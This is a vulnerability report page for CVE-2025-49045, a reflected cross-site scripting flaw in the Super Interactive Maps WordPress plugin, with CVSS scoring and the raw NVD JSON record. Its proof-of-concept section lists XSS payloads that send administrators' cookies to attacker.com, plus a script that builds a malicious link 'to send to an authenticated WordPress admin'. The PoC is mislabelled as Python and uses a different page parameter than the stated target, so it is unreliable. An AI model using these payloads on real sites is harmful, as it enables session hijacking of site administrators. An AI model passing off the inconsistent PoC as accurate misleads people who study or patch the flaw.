Security Vulnerability Report
中文
CVE-2025-49045 CVSS 7.1 HIGH

CVE-2025-49045

Published: 2026-01-22 17:15:55
Last Modified: 2026-04-27 20:16:08

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in highwarden Super Interactive Maps super-interactive-maps allows Reflected XSS.This issue affects Super Interactive Maps: from n/a through <= 2.3.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Super Interactive Maps <= 2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-49045 Reflected XSS PoC --> <!-- Target: Super Interactive Maps WordPress Plugin <= 2.3 --> <!-- Author: Generated for security analysis --> <!-- Malicious URL to trigger the XSS --> https://target-site.com/wp-admin/admin.php?page=super-interactive-maps&map_id=<script>alert(document.cookie)</script> <!-- Alternative payload variants --> <!-- 1. Image tag onerror event --> <img src=x onerror=this.src='https://attacker.com/steal?cookie='+document.cookie> <!-- 2. SVG element injection --> <svg/onload=fetch('https://attacker.com/log?data='+document.cookie)> <!-- 3. Body onload event --> <body onload=document.location='https://attacker.com/steal?c='+document.cookie> <!-- HTML Context PoC --> <script> // Simulated attack scenario const targetUrl = 'http://target-site.com/wp-admin/admin.php'; const maliciousParam = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'; const exploitUrl = `${targetUrl}?page=sim-plugins&param=${encodeURIComponent(maliciousParam)}`; console.log('Exploit URL:', exploitUrl); console.log('Send this URL to authenticated WordPress admin'); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49045", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:55.407", "lastModified": "2026-04-27T20:16:08.413", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in highwarden Super Interactive Maps super-interactive-maps allows Reflected XSS.This issue affects Super Interactive Maps: from n/a through <= 2.3."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en highwarden Super Interactive Maps super-interactive-maps permite XSS Reflejado. Este problema afecta a Super Interactive Maps: desde n/a hasta &lt;= 2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/super-interactive-maps/vulnerability/wordpress-super-interactive-maps-plugin-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}